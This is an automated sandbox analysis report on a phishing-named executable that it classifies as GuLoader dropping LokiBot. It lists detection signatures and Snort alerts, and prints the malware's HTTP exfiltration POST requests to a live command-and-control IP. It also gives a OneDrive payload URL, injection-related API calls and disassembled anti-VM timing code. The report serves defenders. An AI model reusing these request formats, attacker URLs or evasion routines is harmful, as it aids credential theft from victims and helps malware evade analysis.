Analysis Report URGENT QUOTATION.exe

Overview

General Information

Sample Name: URGENT QUOTATION.exe
Analysis ID: 356236
MD5: b49c71be94624173a9683580c792b195
SHA1: 4b78a8199129007580b91060db70ce44fe7278e5
SHA256: 8cf8f18fb85f0e190ff77fd57264cf9e31dd7128f1b4ad43713e128a6d68e867
Tags: GuLoader

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • URGENT QUOTATION.exe (PID: 6160 cmdline: 'C:\Users\user\Desktop\URGENT QUOTATION.exe' MD5: B49C71BE94624173A9683580C792B195)
    • URGENT QUOTATION.exe (PID: 6792 cmdline: 'C:\Users\user\Desktop\URGENT QUOTATION.exe' MD5: B49C71BE94624173A9683580C792B195)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |
Process Memory Space: URGENT QUOTATION.exe PID: 6160 | JoeSecurity_VB6DownloaderGeneric | Yara detected VB6 Downloader Generic | Joe Security |
Process Memory Space: URGENT QUOTATION.exe PID: 6160 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |
Process Memory Space: URGENT QUOTATION.exe PID: 6792 | JoeSecurity_VB6DownloaderGeneric | Yara detected VB6 Downloader Generic | Joe Security |
Process Memory Space: URGENT QUOTATION.exe PID: 6792 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Multi AV Scanner detection for domain / URL
Source: http://51.195.53.221/p.php/594QbwaP456AN | Virustotal: Detection: 10%
Multi AV Scanner detection for submitted file
Source: URGENT QUOTATION.exe | Virustotal: Detection: 28%
Source: URGENT QUOTATION.exe | ReversingLabs: Detection: 48%
Machine Learning detection for sample
Source: URGENT QUOTATION.exe | Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files
Source: URGENT QUOTATION.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49743 -> 51.195.53.221:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49743 -> 51.195.53.221:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49743 -> 51.195.53.221:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49743 -> 51.195.53.221:80
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49744 -> 51.195.53.221:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49744 -> 51.195.53.221:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49744 -> 51.195.53.221:80
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49744 -> 51.195.53.221:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49745 -> 51.195.53.221:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49745 -> 51.195.53.221:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49745 -> 51.195.53.221:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49745 -> 51.195.53.221:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49748 -> 51.195.53.221:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49748 -> 51.195.53.221:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49748 -> 51.195.53.221:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49748 -> 51.195.53.221:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49749 -> 51.195.53.221:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49749 -> 51.195.53.221:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49749 -> 51.195.53.221:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49749 -> 51.195.53.221:80
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49750 -> 51.195.53.221:80
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49750 -> 51.195.53.221:80
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49750 -> 51.195.53.221:80
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49750 -> 51.195.53.221:80
Source: Joe Sandbox View | IP Address: 51.195.53.221
Source: Joe Sandbox View | ASN Name: OVHFR
Source: global traffic | HTTP traffic detected:
    POST /p.php/594QbwaP456AN HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 51.195.53.221
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 244CE878
    Content-Length: 190
    Connection: close
Source: global traffic | HTTP traffic detected:
    POST /p.php/594QbwaP456AN HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 51.195.53.221
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 244CE878
    Content-Length: 163
    Connection: close
Source: unknown | TCP traffic detected without corresponding DNS query: 51.195.53.221
Source: unknown | DNS traffic detected: queries for: onedrive.live.com
Source: unknown | HTTP traffic detected:
    POST /p.php/594QbwaP456AN HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 51.195.53.221
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 244CE878
    Content-Length: 190
    Connection: close
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Mon, 22 Feb 2021 18:55:26 GMT
    Server: Apache
    Connection: close
    Content-Type: text/html; charset=UTF-8
Source: URGENT QUOTATION.exe, 00000004.00000002.711543447.000000001E174000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: URGENT QUOTATION.exe, 00000004.00000002.711543447.000000001E174000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: URGENT QUOTATION.exe, 00000004.00000002.711543447.000000001E174000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: URGENT QUOTATION.exe, 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp | String found in binary or memory: https://onedrive.live.com/download?cid=604AA6C584DB9137&resid=604AA6C584DB9137%21123&authkey=ANCFnep

System Summary:

Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: URGENT QUOTATION.exe
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_021853EC NtWriteVirtualMemory, 0_2_021853EC
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_0218613D NtSetInformationThread, NtMapViewOfSection, 0_2_0218613D
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_02185CF0 NtProtectVirtualMemory, 0_2_02185CF0
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_021804E7 EnumWindows, NtSetInformationThread, NtWriteVirtualMemory, 0_2_021804E7
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_02186210 NtMapViewOfSection, 0_2_02186210
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_02186239 NtMapViewOfSection, 0_2_02186239
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_02186263 NtMapViewOfSection, 0_2_02186263
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_02186281 NtMapViewOfSection, 0_2_02186281
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_02186315 NtMapViewOfSection, 0_2_02186315
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_0218633D NtMapViewOfSection, 0_2_0218633D
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_02186328 NtMapViewOfSection, 0_2_02186328
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_02186353 NtMapViewOfSection, 0_2_02186353
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_02186387 NtMapViewOfSection, 0_2_02186387
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_0218182B NtWriteVirtualMemory, 0_2_0218182B
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_02182822 NtWriteVirtualMemory, 0_2_02182822
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_02182873 NtWriteVirtualMemory, 0_2_02182873
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_021820B4 NtSetInformationThread, 0_2_021820B4
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_021828CA NtWriteVirtualMemory, 0_2_021828CA
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_0218290F NtWriteVirtualMemory, 0_2_0218290F
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_02186145 NtMapViewOfSection, 0_2_02186145
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_0218216A NtSetInformationThread, NtWriteVirtualMemory, 0_2_0218216A
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_02186161 NtMapViewOfSection, 0_2_02186161
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_02186197 NtMapViewOfSection, 0_2_02186197
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_021861B5 NtMapViewOfSection, 0_2_021861B5
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_021861F5 NtMapViewOfSection, 0_2_021861F5
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_02180602 NtSetInformationThread, 0_2_02180602
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_02182605 NtWriteVirtualMemory, 0_2_02182605
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_0218063F NtSetInformationThread, 0_2_0218063F
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_02182666 NtWriteVirtualMemory, 0_2_02182666
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_02182689 NtWriteVirtualMemory, 0_2_02182689
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_021826B2 NtWriteVirtualMemory, 0_2_021826B2
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_021826F9 NtWriteVirtualMemory, 0_2_021826F9
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_02182727 NtWriteVirtualMemory, 0_2_02182727
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_02182773 NtWriteVirtualMemory, 0_2_02182773
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_021827A3 NtWriteVirtualMemory, 0_2_021827A3
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_0218247B NtWriteVirtualMemory, 0_2_0218247B
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_021824D3 NtWriteVirtualMemory, 0_2_021824D3
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_021824EB NtWriteVirtualMemory, 0_2_021824EB
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_021814E5 NtWriteVirtualMemory, 0_2_021814E5
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_02182523 NtWriteVirtualMemory, 0_2_02182523
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_0218058F NtSetInformationThread, 0_2_0218058F
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_02182581 NtWriteVirtualMemory, 0_2_02182581
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_021825B7 NtWriteVirtualMemory, 0_2_021825B7
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_021805AB NtSetInformationThread, 0_2_021805AB
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_021805CD NtSetInformationThread, 0_2_021805CD
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 0_2_021845FA NtSetInformationThread, NtWriteVirtualMemory, 0_2_021845FA
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_00565CF0 NtProtectVirtualMemory, 4_2_00565CF0
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_00562CB0 Sleep, NtProtectVirtualMemory, 4_2_00562CB0
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_0056216A RtlAddVectoredExceptionHandler, NtProtectVirtualMemory, LdrInitializeThunk, NtProtectVirtualMemory, 4_2_0056216A
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_0056210E TerminateThread, LdrInitializeThunk, NtProtectVirtualMemory, 4_2_0056210E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_0056613D NtSetInformationThread, 4_2_0056613D
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_00562DB2 LdrInitializeThunk, LdrInitializeThunk, LdrInitializeThunk, LdrInitializeThunk, NtProtectVirtualMemory, 4_2_00562DB2
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_005620B4 TerminateThread, LdrInitializeThunk, NtProtectVirtualMemory, 4_2_005620B4
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_00562D5B NtProtectVirtualMemory, 4_2_00562D5B
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_00562144 LdrInitializeThunk, NtProtectVirtualMemory, 4_2_00562144
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_00566145 NtSetInformationThread, 4_2_00566145
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_0056217B NtProtectVirtualMemory, 4_2_0056217B
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_00566161 NtSetInformationThread, 4_2_00566161
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_00562117 TerminateThread, LdrInitializeThunk, NtProtectVirtualMemory, 4_2_00562117
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_00562D26 NtProtectVirtualMemory, 4_2_00562D26
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_00562D29 NtProtectVirtualMemory, 4_2_00562D29
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_005661F5 NtSetInformationThread, 4_2_005661F5
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_005621EF NtProtectVirtualMemory, 4_2_005621EF
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_00562D96 LdrInitializeThunk, NtProtectVirtualMemory, 4_2_00562D96
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_00566197 NtSetInformationThread, 4_2_00566197
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_00562D99 LdrInitializeThunk, NtProtectVirtualMemory, 4_2_00562D99
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_005621B5 NtProtectVirtualMemory, 4_2_005621B5
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_005661B5 NtSetInformationThread, 4_2_005661B5
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_00562DBB LdrInitializeThunk, NtProtectVirtualMemory, 4_2_00562DBB
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_00562E46 LdrInitializeThunk, NtProtectVirtualMemory, 4_2_00562E46
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_00566263 NtSetInformationThread, 4_2_00566263
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_00566210 NtSetInformationThread, 4_2_00566210
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_00562E0F LdrInitializeThunk, NtProtectVirtualMemory, 4_2_00562E0F
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_00566239 NtSetInformationThread, 4_2_00566239
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_00566281 NtSetInformationThread, 4_2_00566281
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_00566353 NtSetInformationThread, 4_2_00566353
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_00566315 NtSetInformationThread, 4_2_00566315
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_0056633D NtSetInformationThread, 4_2_0056633D
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_00566328 NtSetInformationThread, 4_2_00566328
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_00566387 NtSetInformationThread, 4_2_00566387
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Code function: 4_2_00562F0F 4_2_00562F0F
Source: URGENT QUOTATION.exe, 00000000.00000000.646889990.000000000043B000.00000002.00020000.sdmp | Binary or memory string: OriginalFilename constantinsborg.exe vs URGENT QUOTATION.exe
Source: URGENT QUOTATION.exe, 00000000.00000002.674117945.0000000002140000.00000002.00000001.sdmp | Binary or memory string: OriginalFilename user32j% vs URGENT QUOTATION.exe
Source: URGENT QUOTATION.exe, 00000004.00000002.711483674.000000001DD80000.00000002.00000001.sdmp | Binary or memory string: OriginalFilename mswsock.dll.muij% vs URGENT QUOTATION.exe
Source: URGENT QUOTATION.exe, 00000004.00000002.711498445.000000001DED0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilename CRYPT32.DLL.MUIj% vs URGENT QUOTATION.exe
Source: URGENT QUOTATION.exe, 00000004.00000000.671322005.000000000043B000.00000002.00020000.sdmp | Binary or memory string: OriginalFilename constantinsborg.exe vs URGENT QUOTATION.exe
Source: URGENT QUOTATION.exe | Binary or memory string: OriginalFilename constantinsborg.exe vs URGENT QUOTATION.exe
Source: URGENT QUOTATION.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/2@2/1
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | File created: C:\Users\user\AppData\Local\Temp\~DFBD8596DEFB17F0B4.TMP
Source: URGENT QUOTATION.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: URGENT QUOTATION.exe | Virustotal: Detection: 28%
Source: URGENT QUOTATION.exe | ReversingLabs: Detection: 48%
Source: unknown | Process created: C:\Users\user\Desktop\URGENT QUOTATION.exe 'C:\Users\user\Desktop\URGENT QUOTATION.exe'
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Process created: C:\Users\user\Desktop\URGENT QUOTATION.exe 'C:\Users\user\Desktop\URGENT QUOTATION.exe'
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Data Obfuscation:

Yara detected GuLoader
Source: Yara match | File source: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: URGENT QUOTATION.exe PID: 6160, type: MEMORY
Source: Yara match | File source: Process Memory Space: URGENT QUOTATION.exe PID: 6792, type: MEMORY
Yara detected VB6 Downloader Generic
Source: Yara match | File source: Process Memory Space: URGENT QUOTATION.exe PID: 6160, type: MEMORY
Source: Yara match | File source: Process Memory Space: URGENT QUOTATION.exe PID: 6792, type: MEMORY
Source: URGENT QUOTATION.exe | Static PE information: real checksum: 0x29a19 should be: 0x2d90a
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218321F push ebx; iretd 0_2_02183222
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218020B push ebx; iretd 0_2_0218020E
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02185A39 push ebx; iretd 0_2_02185A3A
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218223D push ebx; iretd 0_2_0218223E
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218023F push ebx; iretd 0_2_02180242
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02181A31 push ebx; iretd 0_2_02181A32
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02180227 push ebx; iretd 0_2_0218022A
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218525B push ebx; iretd 0_2_0218525E
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218024B push ebx; iretd 0_2_0218024E
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218527B push ebx; iretd 0_2_0218527E
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02185A7B push ebx; iretd 0_2_02185A7E
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218127F push ebx; iretd 0_2_02181282
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218526F push ebx; iretd 0_2_02185272
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02186261 push ebx; iretd 0_2_02186262
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182A63 push ebx; iretd 0_2_02182A66
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218129D push ebx; iretd 0_2_0218129E
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02180297 push ebx; iretd 0_2_0218029A
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02180287 push ebx; iretd 0_2_0218028A
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021802B9 push ebx; iretd 0_2_021802BA
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182AAF push ebx; iretd 0_2_02182AB2
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021802A3 push ebx; iretd 0_2_021802A6
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02184AA5 push ebx; iretd 0_2_02184AA6
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021852A5 push ebx; iretd 0_2_021852A6
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021832DB push ebx; iretd 0_2_021832DE
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021802D7 push ebx; iretd 0_2_021802DA
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021842C9 push ebx; iretd 0_2_021842CA
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021802CD push ebx; iretd 0_2_021802CE
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021852CD push ebx; iretd 0_2_021852CE
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021802C3 push ebx; iretd 0_2_021802C6
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021852F9 push ebx; iretd 0_2_021852FA
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021802F3 push ebx; iretd 0_2_021802F6
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOOPENFILEERRORBOX (3 occurrences)
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX (115 occurrences)

            Malware Analysis System Evasion:

            Detected RDTSC dummy instruction sequence (likely for instruction hammering)
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 000000000218522C second address: 000000000218522C instructions:
                0x00000000 rdtsc
                0x00000002 xor eax, eax
                0x00000004 inc eax
                0x00000005 cpuid
                0x00000007 popad
                0x00000008 call 00007F270CB2D938h
                0x0000000d lfence
                0x00000010 mov edx, dword ptr [7FFE0014h]
                0x00000016 lfence
                0x00000019 ret
                0x0000001a sub edx, esi
                0x0000001c ret
                0x0000001d jmp 00007F270CB2D946h
                0x0000001f cmp ah, FFFFFFFFh
                0x00000022 add edi, edx
                0x00000024 dec dword ptr [ebp+000000F8h]
                0x0000002a jmp 00007F270CB2D942h
                0x0000002c cmp bx, ax
                0x0000002f cmp dword ptr [ebp+000000F8h], 00000000h
                0x00000036 jne 00007F270CB2D8EEh
                0x00000038 call 00007F270CB2D9AEh
                0x0000003d call 00007F270CB2D948h
                0x00000042 lfence
                0x00000045 mov edx, dword ptr [7FFE0014h]
                0x0000004b lfence
                0x0000004e ret
                0x0000004f mov esi, edx
                0x00000051 pushad
                0x00000052 rdtsc
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 000000000218091B second address: 000000000218091B instructions:
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 0000000002183842 second address: 0000000002183850 instructions:
                0x00000000 rdtsc
                0x00000002 mov eax, 00000001h
                0x00000007 cpuid
                0x00000009 popad
                0x0000000a pushad
                0x0000000b lfence
                0x0000000e rdtsc
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 0000000002180A17 second address: 0000000002180A17 instructions:
            Tries to detect Any.run
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
